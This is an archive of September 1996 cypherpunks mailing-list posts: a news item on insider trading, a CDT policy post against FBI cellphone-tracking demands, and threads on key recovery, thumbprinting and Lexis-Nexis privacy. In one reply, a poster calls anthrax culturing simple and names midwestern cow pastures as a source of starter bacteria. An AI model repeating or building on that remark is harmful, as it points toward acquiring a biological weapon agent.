>>      Copyright &copy 1996 The Associated Press
>      
>>   WASHINGTON (Sep 18, 1996 10:35 a.m. EDT) -- One of the most infamous
>>   acts in the financial fraudster's playbook, insider trading, remains
>>   at record levels, despite a decade of steady crackdowns by regulators.
>   
>[...]
>
>>   The SEC brought one of its more unusual insider trading cases on
>>   Monday, when it sued the unnamed account holders in a Swiss and
>>   Bahamian accounts with insider trading ahead of The Gillette Co.'s
>>   merger proposal for Duracell International.
>   
>[...]
>
>>   One disturbing development for regulators is a recent decision by the
>>   8th U.S. Circuit Court of Appeals that struck down one of the SEC's
>>   main enforcement tools in insider trading cases.
>   
>>   The court, which covers several Midwestern states, rejected the
>>   so-called "misappropriation theory" in insider trading cases, which is
>>   used to nab people trading on inside information who don't owe a
>>   fiduciary duty to the company's shareholders. The court also rejected
>>   an SEC rule used to snare insider trading in tender offers.
>   
>>   The 8th Circuit decision came in August in a Justice Department case
>>   against Minneapolis attorney James H. O'Hagan, who was charged with
>>   insider trading during the 1988 takeover bid of Pillsbury Co. by Grand
>>   Metropolitan PLC. SEC General Counsel Richard Walker has asked the
>>   appeals court for a rehearing on the matter.
>   
>>   While the 8th Circuit decision represents a setback for the SEC, the
>>   agency usually brings its cases in the New York and Chicago areas,
>>   where the federal courts acknowledge these insider trading rules.
>   
>>   Regulators say these enforcement tools are important because insider
>>   trading follows few patterns. In an analysis of 35 cases brought in
>>   1995 that solely dealt with insider trading, Gerlach said 20 involved
>>   trading ahead of mergers, three ahead of other positive corporate
>>   announcements and six ahead of bad corporate news.
>   
>>   He described 16 of the cases as "classic insider trading" involving an
>>   executive, company director or employee who traded on confidential,
>>   market sensitive information or tipped friends about it. Among the
>>   remaining cases, four involved trading by securities brokers or other
>>   industry officials, four involved law firm employees and one, an
>>   employee at an outside accounting firm.
>   
>>   Investigators at the Nasdaq Stock Market's market surveillance unit
>>   refer a significant number of insider trading cases to the SEC. Halley
>>   Milligan, who heads a team of nine insider trading investigators at
>>   Nasdaq, said the market has made 73 referrals on suspected insider
>>   trading to the SEC so far in 1996, which is on par with last year,
>>   when 107 cases were referred to the agency.
>   
>>   Nasdaq, like major stock markets, uses sophisticated computer
>>   technology to sniff out illegal trading. The Nasdaq system is called
>>   SWAT, or Stock Watch Automatic Tracking, which scans news databases
>>   after detecting any unusual trading.
>   
>[...]
>
>>    Copyright &copy 1996 Nando.net
>
>unsubsribe 



please





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ryan Russell/SYBASE <Ryan.Russell@sybase.com>
Date: Sat, 21 Sep 1996 05:37:02 +0800
To: Rick Osborne <osborne@sybase.com>
Subject: Re: CNET Digital Dispatch Vol. 2 No. 38
Message-ID: <9609201840.AA19437@notesgw2.sybase.com>
MIME-Version: 1.0
Content-Type: text/plain


EDS is a large company Perot used to own..

I worked for them for a short time...a very short time..

    Ryan

---------- Previous Message ----------
To: cypherpunks
cc: 
From: osborne @ gateway.grumman.com (Rick Osborne) @ smtp
Date: 09/20/96 02:12:22 AM
Subject: CNET Digital Dispatch  Vol. 2 No. 38

This week's c|net digital dispatch had the following top ten list.  For
number 8, did they mean DES or is the EDS something I'm not aware of.  I
figure it has to be because what does DES have to do with chat rooms?

>9. TOP TEN REASONS WHY THE PRESIDENTIAL DEBATES WON'T TAKE
>PLACE ON THE WEB
>
>10. Kemp would fight with Dole over who gets to
>    "quarterback" the keyboard.
>9. Oops: Gore plugged information superhighway cable
>   into White House central vacuum system.
>8. Perot's crack team of EDS hackers would get him
>   in somehow.
>7. Hotwired editors say presidential candidates not
>   hip enough.
>6. Hillary doesn't let the President in ANY chat rooms.
>5. Debate commission insists: event must be on Prodigy.
>4. Bill Gates owns the rights to online debates.
>3. Dole's Selectric won't connect to the Net.
>2. Chelsea is using the White House PC to write a
>   book report.
>1. In cyberspace, no one can feel your pain.


____________________________________________________________
Rick Osborne                     osborne@gateway.grumman.com
"The universe doesn't give you any points for doing things that are easy."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Gary Howland <gary@systemics.com>
Date: Fri, 20 Sep 1996 21:19:37 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: DL in exchange for fingerprint
In-Reply-To: <ae67137f030210047b42@[207.167.93.63]>
Message-ID: <32426E55.15FB7483@systemics.com>
MIME-Version: 1.0
Content-Type: text/plain


Timothy C. May wrote:
> 
> At 9:13 PM 9/19/96, Gary Howland wrote:
> >Timothy C. May wrote:
> >>
> >> (Yes, I disliked being thumb-printed, but I could see no viable
> >> alternative. I'm sure Duncan has some scheme to declare himself a Botswanan
> >> exchange student, but I decided being thumb-printed was the lesser hassle.)
> >
> >Sure, it's always less hassle doing what they want.  Privacy doesn't
> >come for free.  It's easier to let the police search you in the street
> >than it is to make them arrest you so that you can make a formal
> >complaint.
> 
> So, just what it is _your_ method of dealing with this? While it is noble
> to talk about fighting the system, just how do you go about doing it
> yourself?

Use your imagination.  (hint: Do all states require thumbprints for
DLs?)


> (This space reserved for your lecture about how I need to be prepared to go
> to jail to defend my right not to be thumbprinted, etc. On second thought,
> why don't you be the one to go to jail, and then you can let us know your
> experiences.)

I have never seen the logic in this approach.  Sure, if it's relatively
easy to make a protest, then I'll do it, but going to jail out of
principle is certainly more hassle for me than for "them". I would
sooner demonstrate the futility of what they are trying to do, whether
it be censorship or prohibition. 


> >Hmm - who are you paraphrasing here? (Just curious).
> 
> "What part of "No" don't you understand?"

Who said it?


Gary
--
"Of course the US Constitution isn't perfect; but it's a lot better
than what we have now."  -- Unknown.

pub  1024/C001D00D 1996/01/22  Gary Howland <gary@systemics.com>
Key fingerprint =  0C FB 60 61 4D 3B 24 7D  1C 89 1D BE 1F EE 09 06




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: editor@cdt.org (Bob Palacios)
Date: Sat, 21 Sep 1996 04:13:57 +0800
To: cypherpunks@toad.com
Subject: CDT Policy Post 2.32 - FBI Surveillance Demands Rejected on Privacy Grounds
Message-ID: <v02140b05ae6872dba0a4@[204.157.127.16]>
MIME-Version: 1.0
Content-Type: text/plain


-----------------------------------------------------------------------------
    _____ _____ _______
   / ____|  __ \__   __|   ____        ___               ____             __
  | |    | |  | | | |     / __ \____  / (_)______  __   / __ \____  _____/ /_
  | |    | |  | | | |    / /_/ / __ \/ / / ___/ / / /  / /_/ / __ \/ ___/ __/
  | |____| |__| | | |   / ____/ /_/ / / / /__/ /_/ /  / ____/ /_/ (__  ) /_
   \_____|_____/  |_|  /_/    \____/_/_/\___/\__, /  /_/    \____/____/\__/
   The Center for Democracy and Technology  /____/     Volume 2, Number 32
----------------------------------------------------------------------------
      A briefing on public policy issues affecting civil liberties online
----------------------------------------------------------------------------
 CDT POLICY POST Volume 2, Number 32                    September 20, 1996

 CONTENTS: (1) FBI Demands for Broad New Surveillance Power Rejected on
               Privacy Grounds
           (2) CDT Background Memo on the FBI Demands
           (3) How to Subscribe/Unsubscribe
           (4) About CDT, contacting us

  ** This document may be redistributed freely with this banner intact **
        Excerpts may be re-posted with permission of <editor@cdt.org>
         ** This document looks best when viewed in COURIER font **
-----------------------------------------------------------------------------

(1) FBI Demands for Broad New Surveillance Power Rejected on Privacy
    Grounds

A telecommunications industry standards body on Thursday voted to reject a
demand by the FBI to create a national tracking system out of the wireless
telephone network.  CDT applauds this decision as a significant victory
for privacy and condemns the FBI's blatant efforts to subvert the specific
requirements of the Communications Assistance for Law Enforcement Act
(CALEA, also known as "Digital Telephony").

"The FBI is demanding that every cell phone double as a tracking device,
providing instant and continuous location information not just when a
subject is talking but whenever a cellular phone is turned on. " said CDT
Executive Director Jerry Berman. "The FBI is demanding real-time tracking
of anyone suspected of committing a crime.  This is a clear violation of
the statute and the Fourth Amendment." Berman added

At issue are technical standards currently being drafted to implement the
1994 law. The FBI, which holds an influential position within the industry
standards process, has demanded that the wireless telephone network be
designed in a way that would allow real time tracking of individuals
suspected of a crime.

Specifically, the FBI is demanding that wireless networks be designed to
facilitate:

* Tracking of the physical location of a subject any time a cellular
  phone is turned on (even if no call is being made or received)

* Tracking of the physical location of a subject when a cellular phone
  moves within a service area or moves to another carrier's service area

* Tracking of the physical location of a subject when a cellular phone
  makes or receives a call

* Delivery of this information to law enforcement in real time (within
  500 milliseconds)

Although law enforcement currently has the authority to obtain certain
location information through a search warrant, the standards proposed by
the FBI would have allowed access to far more detailed location information
under a lower standard.

"The law was designed to freeze the FBI in time, not as a blank check to
the FBI to design the telecommunications network any way it pleased."
Berman said. "The FBI's demands go far beyond what's permitted under CALEA
and contradict statements by Director Freeh before Congress 2 years ago."

The drafters of CALEA specifically stated that the statute was not designed
to expand law enforcement surveillance authority. The Committee report on
the legislation notes:

 "The FBI director testified that the legislation was intended to
  preserve the status quo, that it was intended to provide law
  enforcement no more and no less access to information than it had in
  the past. The Committee urges against over broad interpretation of the
  requirements."
   -- House Judiciary Committee Report to Accompany H.R. 4922. Rept.
      103-827 Part 1, Page 22

NEXT STEPS

In order to ensure public oversight and accountability over the FBI's
surveillance authority, CALEA requires the government to reimburse the
telecommunications industry for the costs of meeting the statute's
requirements.  Congress is currently considering a mechanism to fund the
implementation of the law.

CDT urges the Congress to exercise its oversight role to determine whether
the FBI is seeking to use CALEA to expand current surveillance capabilities
contrary to the specific intent of the law.  Unless and until the FBI
clarifies its intent and justifies its demands, Congress should not allow
the expenditure of any funds to implement CALEA.

CDT and a ad-hoc task force of other privacy organizations and
telecommunications industry representatives are currently conducting a
review of electronic surveillance issues at the request of Senators Patrick
Leahy (D-VT) and Arlen Specter (R-PA).  The task force report will cover the
implementation of CALEA and will be released within the next few months.
CDT stands ready to intervene again at the standards setting process and
before the FCC if necessary in order to ensure that privacy is protected as
CALEA is implemented.

The Center for Democracy and Technology is a Washington DC based non-profit
public interest organization focusing on free speech and privacy issues in
new computer and communications technology.  CDT can be found on the World
Wide Web at:  http://www.cdt.org/

-----------------------------------------------------------------------

(2) CDT BACKGROUND MEMO ON THE FBI DEMANDS

FBI SEEKS TO USE CELLULAR TELEPHONES AS TRACKING DEVICES

The FBI is demanding the telecommunications industry design cellular
telephone networks in a way which would allow law enforcement to track
the physical location and movements of individuals in clear violation of
the law.  This effort by the FBI raises grave privacy concerns and must
be rejected by the telecommunications industry.

In ongoing discussions with a Telecommunications Industry Association
committee established to set technical standards to implement the
Communications Assistance for Law Enforcement Act (CALEA, P.L. 103-414,
also known as the "Digital Telephony" statute), the FBI is requesting
surveillance capability far beyond current law enforcement capabilities and
in clear violation of the scope of the law.

CALEA was not designed as a blank check from Congress allowing law
enforcement to design the telecommunications network to expand existing
surveillance capability. Rather, the statute was carefully balanced to
ensure that law enforcement maintain the status quo. This overreaching by
the FBI raises serious privacy concerns and clearly violates the balance
struck by CALEA.  CDT strongly urges Congress to refrain from approving any
funding for the implementation of CALEA until the FBI makes its intentions
clear.

FBI Demanding Location Information In Clear Violation of the Statute

The FBI's request is contained in a proposal called the Electronic
Surveillance Interface (ESI), which specifies the design of the interface
between the telecommunications network and law enforcement's own
surveillance equipment. The FBI has refused a formal request by CDT to view
a copy of the ESI.

However, documents obtained from a meeting of the FBI and the
telecommunications industry on September 12 indicate that the FBI is
demanding that cellular networks be designed to deliver location
information to law enforcement.  Specifically,  the ESI states that
cellular networks must be designed to provide the geographic location of a
particular subject:

The ESI states:

  R7-62     The SSM (Surveillance Status Message) shall be delivered to
            the LEA (Law Enforcement Authority) whenever the subject
            changes location or between systems and this location is
            available to the IAP (Intercept Access Point)

In short, the FBI is requesting that the cellular network be designed to
report the geographic location of an individual subject:

1. When a cellular phone is turned on (even if no call is made)
2. When a cellular phone moves within a service area or moves to another
   carrier's service area.
3. When a cellular phone makes or receives a call.

The FBI claims that location information has to be provided to law
enforcement under CALEA because it is part of  "call setup information."
However, in his testimony before a joint hearing of the House and Senate
Judiciary Committees on March 18, 1994, FBI Freeh director stated exactly
the opposite:

 "Several privacy-based spokespersons have criticized the wording of the
  definition (of call setup information)... alleging that the government
  is seeking a new, pervasive, automated 'tracking' capability. Such
  allegations are completely wrong.... In order to make clear that the
  acquisition of such information is not... included within the term
  'call setup information' we are prepared to add a concluding phrase to
  this definition to explicitly clarify the point: '*** except that such
  information [call setup information] shall not include any information
  that may disclose the physical location of a mobile facility or
  service beyond that associated with the number's area code or
  exchange.'"    (Testimony of FBI director Louis Freeh before a joint
  hearing of the House Judiciary Subcommittee on Civil and
  Constitutional Rights and the Senate Judiciary Subcommittee on
  Technology and the Law, March 18, 1994. S. Hrg 103-1022).

The drafters of CALEA noted in the Committee report that the statute was not
designed to expand law enforcement surveillance ability:

 "The FBI director testified that the legislation was intended to
  preserve the status quo, that it was intended to provide law
  enforcement no more and no less access to information than it had in
  the past.  The Committee urges against over broad interpretation of
  the requirements." (House Judiciary Committee Report to Accompany H.R.
  4922. Rept. 103-827 Part 1, page 22)

The FBI's demand that all wireless communications equipment provide the
physical locations of a subscriber at all times goes raises obvious privacy
issues and goes well beyond the scope of CALEA and the explicit statements
of the FBI.

No Funds Should Be Appropriated to Implement CALEA Until This Issue is Resolved

In passing CALEA, Congress sought to preserve law enforcement's ability to
conduct electronic surveillance as new communications technologies are
developed.  At the same time, Congress was very clear that the law was
designed to preserve the status quo and not to expand law enforcement
surveillance authority.  In addition, Congress took the extra step of
including substantial Congressional oversight and public accountability to
the implementation process in order to ensure that law enforcement did not
overreach and that privacy interests would be protected.

The law requires the telecommunications industry to set standards for
meeting the FBI's general requirements in an open process, allows
interested parties to challenge any standard before the FCC if it fails to
protect privacy, and requires Congressional oversight and accountability
over the implementation of the law by mandating government reimbursement
for expensive capability upgrades.

We urge Congress to exercise its oversight role to determine whether in
fact the FBI is seeking to use CALEA to expand its current surveillance
capabilities contrary to the intent of the law.  Unless and until the FBI
clarifies its intent and justifies its demands, Congress should not allow
the expenditure of any funds to implement CALEA.

We look forward to discussing this issue with you further.  If you have any
questions please contact:

Center for Democracy and Technology        +1.202.637.9800
        Danny Weitzner, Deputy Director      <djw@cdt.org>
        Jonah Seiger, Policy Analyst         <jseiger@cdt.org>

-----------------------------------------------------------------------

(3) SUBSCRIPTION INFORMATION

Be sure you are up to date on the latest public policy issues affecting
civil liberties online and how they will affect you! Subscribe to the CDT
Policy Post news distribution list.  CDT Policy Posts, the regular news
publication of the Center For Democracy and Technology, are received by
nearly 10,000 Internet users, industry leaders, policy makers and
activists, and have become the leading source for information about
critical free speech and privacy issues affecting the Internet and other
interactive communications media.

To subscribe to CDT's Policy Post list, send mail to

     policy-posts-request@cdt.org

with a subject:

     subscribe policy-posts

If you ever wish to remove yourself from the list, send mail to the
above address with a subject of:

     unsubscribe policy-posts

-----------------------------------------------------------------------

(4) ABOUT THE CENTER FOR DEMOCRACY AND TECHNOLOGY/CONTACTING US

The Center for Democracy and Technology is a non-profit public interest
organization based in Washington, DC. The Center's mission is to develop
and advocate public policies that advance democratic values and
constitutional civil liberties in new computer and communications
technologies.

Contacting us:

General information:  info@cdt.org
World Wide Web:       URL:http://www.cdt.org/
FTP                   URL:ftp://ftp.cdt.org/pub/cdt/

Snail Mail:  The Center for Democracy and Technology
             1634 Eye Street NW * Suite 1100 * Washington, DC 20006
             (v) +1.202.637.9800 * (f) +1.202.637.0968

-----------------------------------------------------------------------
End Policy Post 2.32                                            9/20/96
-----------------------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Chip Mefford <cmefford@avwashington.com>
Date: Sat, 21 Sep 1996 03:45:45 +0800
To: cypherpunks@toad.com
Subject: Public Apology
Message-ID: <v03007806ae68783b34d7@[207.79.65.35]>
MIME-Version: 1.0
Content-Type: text/plain


A feller let me know this afternoon that I have been
posting with a really irritating .sig

I didn't know that sucker was on there.

I'm really sorry







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Sat, 21 Sep 1996 00:14:51 +0800
To: cypherpunks@toad.com
Subject: REJ_ect
Message-ID: <199609201238.MAA05068@pipe4.ny2.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   9-20-96. NYP Page One: 
 
   "Cellular Industry Rejects U.S. Plan for Surveillance. 
   Police Want Technology That Pinpoints Wireless Users Within 
   a Half-Second." Markoff. 
 
      The wireless communications industry voted yesterday to 
      reject Government-backed technology that would make it 
      possible for law enforcement agencies to keep closer 
      tabs on cellular phone users. DoJ wants to be able for 
      the first time to determine the location of a cellular 
      phone caller within a half-second and almost instantly 
      monitor the status of cellular-phone voice mail, 
      conference calls and other wireless communications 
      features. 
 
      Yesterday's vote by a subcommittee of a network 
      operators and manufacturers group called the 
      Telecommunications Industry Association, came in 
      response to a technical document the F.B.I. has been 
      quietly circulating to industry executives since April. 
      Known as the Electronic Surveillance Interface, the 
      document specifies what wireless communications 
      monitoring data must be accessible to law enforcement 
      officials with a court warrant. 
 
   ----- 
 
   http://jya.com/reject.txt  (8 kb) 
 
   REJ_ect 
 
 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Gary Howland <gary@systemics.com>
Date: Fri, 20 Sep 1996 22:49:03 +0800
To: cypherpunks@toad.com
Subject: Re: 56 kbps modems
In-Reply-To: <199609200744.AAA07457@toad.com>
Message-ID: <324276F2.31DFF4F5@systemics.com>
MIME-Version: 1.0
Content-Type: text/plain


Forwarded:

The reason for this, Newsbytes discovered after a chat with Bill Pechey,
technical director with Hayes' European operations, is that the 56,000
bps modem system is actually a digital variant. Instead of the modem
using an audio channel of 3,600 hertz to the exchange, the modem works
across the standard copper wiring seen on most of the world's fixed wire
phone systems.

In order to achieve the 56,000 bps transmission rate, the Rockwell
chip-powered modem will actually physically control the codec at the
telephone exchange across the copper cable. According to Pechey, if a
full 4,000 hertz were available, then an ISDN (integrated service
digital network) channel of 64,000 bps would be available.

"Since the only 3,600 hertz of the audio channel is available through
the codec, we reckon that the maximum transmission speed is around
56,000 bps. Furthermore, because of the high power levels required to
achieve this transmission speed, the back channel will only operate at
standard (analog) modem speeds," he told Newsbytes.

Pechey told Newsbytes that this back channel will support data transfers
somewhere below the 28,800 bps levels, although he noted that Rockwell
claims that 28,800 bps is achievable under ideal conditions.

"This means that the 56K system is best suited for Internet access,
where the data is being transmitted mainly in one direction. For
applications such as videoconferencing, you'd be better off looking to
ISDN for a more balanced rate," he said, noting that the main advantage
of 56k technology over ISDN is the price.

"56K modem technology is cheaper than ISDN, since you don't need an ISDN
system installed. It will work across the standard phone network using a
standard phone socket," he said.

According to Pechey, because the technology involved is closer to
conventional analog modem systems than ISDN, adding 56K transmission
technology to a standard 28,800/33,600 bps modem will not be very
expensive.

"Basically you'll have a black box that will work as a normal analog
modem at 28,800 or 33,600 bps or whatever, but when accessing the
Internet, providing the distant end of the link is a digital connection,
you'll be able to use 56K in one direction, and up to 23,800 bps in the
reverse direction," he said.


--
"Of course the US Constitution isn't perfect; but it's a lot better
than what we have now."  -- Unknown.

pub  1024/C001D00D 1996/01/22  Gary Howland <gary@systemics.com>
Key fingerprint =  0C FB 60 61 4D 3B 24 7D  1C 89 1D BE 1F EE 09 06




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Peter Hrabinsky <peter@internetelite.com>
Date: Sat, 21 Sep 1996 06:13:00 +0800
To: cypherpunks@toad.com
Subject: --
Message-ID: <3242DB00.30B5@internetelite.com>
MIME-Version: 1.0
Content-Type: text/plain






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sat, 21 Sep 1996 04:52:47 +0800
To: Bill Frantz <frantz@netcom.com>
Subject: Re: Fear of Flying -- from HotWired
In-Reply-To: <199609190446.VAA04571@netcom8.netcom.com>
Message-ID: <Pine.SUN.3.94.960920135100.24074A-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 18 Sep 1996, Bill Frantz wrote:

> At  2:51 PM 9/18/96 -0400, Black Unicorn wrote:

> >> >Culturing and growing anthrax is painfully simple.  No DNA required.
> >> 
> >> Sorry Unicorn, you missed my point.  (1) You need DNA to grow bacteria. 
> >> You can get the DNA two ways.  (A) You get a sample of the beast, or (B)
> >> You get a DNA sequence and then regenerate the DNA.  (I don't think B is
> >> technically feasable yet.)  (2) You can't send samples of the beast thru
> >> the net.
> >
> >I think your point was that the net was not responsible for the
> >proliferation of Anthrax development data.  (Am I wrong?)
> 
> My point was that you need more than just information (but see below).  You
> also need some materials that may be hard to get.  Being totally ignorant
> in the anthrax growing area, I have no idea where I would get my starter
> bacteria.  (Presumably any net-info would tell me.  I haven't looked.)

Any of several cow pastures in the midwest.


--
I hate lightning - finger for public key - Vote Monarchist
unicorn@schloss.li





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sat, 21 Sep 1996 05:41:55 +0800
To: Dale Thorn <dthorn@gte.net>
Subject: Re: The GAK Momentum is Building...
In-Reply-To: <3240DD33.28B6@gte.net>
Message-ID: <Pine.SUN.3.94.960920135725.24074B-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 18 Sep 1996, Dale Thorn wrote:

> Lucky Green wrote:
> > On Wed, 18 Sep 1996, Jim Ray wrote:
> > I agree, and hope so. "Key Recovery," while not as Orwellian-sounding 
> > as "GAK," is a step on the path to honesty WRT the English language,
> > though it's important to continually point out, as Tim did in his
> > post, that *access* -- rather than just recovery -- is obviously what 
> > Mr. Freeh wants.
> > I'd count this likely change in terminology as a "cypherpunk victory,"
> > albeit a very small and certainly a very hard-fought one.
> 
> > Nope. It is a Cypherpunk loss. The use of the term "key recovery" for 
> > GAK now fully obfuscates the distinction between accessing a
> > backup copy by the legitimate owner (or his estate, employer, etc.)
> > and GAK. Many PKIs will support the former type of key recovery. And
> > for good reasons. Thanks to the brainwashers using the same term for
> > GAK, it will now become impossible to tell from a basic description of 
> > a PKI if it supports GAK or not. Furthermore, those who oppose the
> > latter type of key recovery (us!), will be pushed further into the
> > fringe by the media now being able to mix up our arguments against GAK 
> > with arguing against true key recovery. [Do you notice the weird
> > constructs I have to use to distinguish the two meanings? One of them 
> > being new...]
> > --Lucky
> 
> My comment: Once the big Corp.'s get used to the new game, they'll put 
> the non-critical stuff out there for Mr. Freeh, and for the really 
> secret data, if the cops confiscate anything they can't read, the Corp. 
> security will put it off on a fall-guy, even as high as the CEO if 
> necessary. I just wanna see one case where a federal judge will try to 
> bleed a big company for contempt for "refusing" to decode and hand over 
> some ostensibly encrypted data. Matter of fact, there are probably cases 
> similar to this that have already been through the appeals courts.

Several.  Most involve foreign banks refusing to turn over records to U.S.
courts.  Most result in powerfully large fines imposed on banks, often on
a per diem basis.

> 
> 

--
I hate lightning - finger for public key - Vote Monarchist
unicorn@schloss.li





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ISP-TV Main Contact <isptv@access.digex.net>
Date: Sat, 21 Sep 1996 05:07:38 +0800
Subject: Declan McCullagh interview on ISP-TV Monday Night
Message-ID: <199609201816.OAA22813@access5.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


*** ISP-TV Program Announcement: Declan McCullagh Interview ***

Monday, Sept. 23
9:00 PM ET

Online activist Declan McCullagh runs the Justice on Campus project, is a
plaintiff in the ACLU/EFF court challenge to the Communications Decency
Act, and maintains the Fight-Censorship mailing list. He also writes for
WIRED/HotWired, and recently described the CDA trial to readers of
Playboy Magazine.

Our chat with Declan will include details of international Internet
censorship, his discoveries concerning what some "Safe Surf" products
actually protect you from, the difference between "indecent" and "harmful
to minors" in new Internet censorship laws, as well as your phoned-in
questions. 

This video interview can be viewed on the ISP-TV main CU-SeeMe reflector
at IP 205.197.247.33, or other ISP-TV affiliate reflectors listed at
http://www.digex.net/isptv/members.html

See URL http://www.digex.net/isptv for more information about the ISP-TV
Network





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: JUDGExMAD@aol.com
Date: Sat, 21 Sep 1996 05:45:33 +0800
To: cypherpunks@toad.com
Subject: cxcxcx
Message-ID: <960920142041_526657182@emout12.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain


unscribe cypherpunks@toad.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeremey Barrett <jeremey@veriweb.com>
Date: Sat, 21 Sep 1996 08:18:57 +0800
To: "Douglas B. Renner" <dougr@skypoint-gw.globelle.com>
Subject: Re: Paradox: NO OPPRESSION IN AMERICA
In-Reply-To: <Pine.3.89.9609201518.A433-0100000@skypoint-gw.globelle.com>
Message-ID: <Pine.BSI.3.93.960920135806.13801E-100000@descartes.veriweb.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Well I'm just grumpy enough right now to tear this apart... :)

On Fri, 20 Sep 1996, Douglas B. Renner wrote:

> Those of you who took Logic 1001 will recall the paradox known as 
> "The Heap" which goes like this:
> 
> 1. A single grain of sand does not constitute a heap of sand.

An debatable but valid assumption.

> 2. You can create a heap from a non-heap by adding a single grain of sand.

How is a non-heap defined? 1 grain? 0 grains? If (2) is to be true, it 
can't be 0, since you assumed (1), so a non-heap must be 1 grain.

> 3. Therefore, there is *NO SUCH THING* as a heap of sand.

Huh? How do you draw that conclusion? (1) and (2) are not contradictory in
any way. You said 1 grain is not a heap, but >1 is. Fine. Valid way of
defining a heap/non-heap of sand. Nothing to do with (3).

> 
> You with me here?  Okay, this is important, because the public actually does 
> think like this:

Very debatable. Very general.

> 
> 1. Our current society in America is not oppressive. (generally accepted)

Very debatable.

> 
> 2. You cannot change a non-oppressive society into an oppressive society
>    by removing one liberty from its citizens.   (also generally accepted)

Rubbish. If the government removes all liberties at once, that's 
oppressive, but if they do it one at a time, it's not?

> 
> 3. Therefore, it is not possible for America to become an oppressive society.
> 

More Rubbish. Not only are your assumptions flawed, but the heap
argument and the oppression argument are entirely unrelated.

Nothing personal, mind you. :)

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Jeremey Barrett
Senior Software Engineer                         jeremey@veriweb.com
VeriWeb Internet Corp.                           http://www.veriweb.com/

PGP Key fingerprint =  3B 42 1E D4 4B 17 0D 80  DC 59 6F 59 04 C3 83 64
PGP Public Key: http://www.veriweb.com/people/jeremey/pgpkey.html
                
		"less is more."  -- Mies van de Rohe.
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMkMLVC/fy+vkqMxNAQFHsgQAmK/nDEVv17ntZ2k172/S5ps4nYJeCFjM
4Ek8eOTG54pju5CYAZBTAYIOZNX4iDp4vK3Qyj3d1PAqpLCqQPJo3/Zr/dz21RH8
RkIP4IvEyFGNzpedh1yFe8wj8zGOPXk9OdblNujx8fFmThuk02zUJyUG+GDxBdDa
zQGuNpTT7H8=
=MFgt
-----END PGP SIGNATURE-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Lynne L. Harrison" <lharrison@csbh.mhv.net>
Date: Sat, 21 Sep 1996 05:49:55 +0800
To: cypherpunks@toad.com
Subject: Re: ANYONES CREDIT CARD # per your request.
Message-ID: <9609201825.AA18161@super.mhv.net>
MIME-Version: 1.0
Content-Type: text/plain


At 11:03 AM 9/20/96 EDT, Brian Hills wrote:
>Thought this would be appropriate to the list

>>Unfortunately, this message needs to be propagated to protect all of us.
>>      
>> Note: Lexis-Nexis is only accepting written or fax requests.


   You can go to their web page (http://www.lexis-nexis.com), click "Just
In" and request via email that your name be removed from their database by
filling out the form.
   Problem, of course, is that one doesn't know if one's name and info is in
the database unless one is a subscriber and can look it up.  I, personally,
do not feel comfortable in filling out a form with my personal info and
sending it along - 1) for the obvious reasons; and 2) what if I'm not even
in their nefarious database?  If not, then I've just entered my personal
info and sent it on its merry way to whomever and wherever unnecessarily -
whether by email, fax, or snail mail.
   I tried just entering my name, email address, and state but, as
anticipated, received a msg that ALL info has to be supplied, so I'll chk
with someone I know that has an account to see if my name is there.
   However, the BIGGEST problem I foresee with this database (and others
like it) is that someone eventually is going to hack it - and then watch the
fun and games ensue.



**********************************************************
Lynne L. Harrison, Esq.     |     "The key to life:
Poughkeepsie, New York      |      - Get up;
lharrison@mhv.net           |      - Survive;
http://www.dueprocess.com   |      - Go to bed."

DISCLAIMER:  I am not your attorney; you are not my client.
             Accordingly, the above is *NOT* legal advice.
**********************************************************






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Michael Froomkin - U.Miami School of Law" <froomkin@law.miami.edu>
Date: Sat, 21 Sep 1996 05:33:47 +0800
To: cypherpunks <cypherpunks@toad.com>
Subject: Re: The GAK Momentum is Building...
In-Reply-To: <3240DD33.28B6@gte.net>
Message-ID: <Pine.SUN.3.95.960920143135.28137U-100000@viper.law.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


In this context, I'm just about to revise the draft at 

http://www.law.miami.edu/~froomkin/articles/planet_clipper.htm

comments welcome.

**Benjamin Bradley Froomkin, b. Sept. 13, 1996, 8 lbs 14.5oz 21.5"**

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | 
U. Miami School of Law     | froomkin@law.miami.edu
P.O. Box 248087            | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | It's hot here.  And humid.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@brainlink.com>
Date: Sat, 21 Sep 1996 06:11:33 +0800
To: "Dr.Dimitri Vulis KOTM" <dlv@bwalk.dm.com>
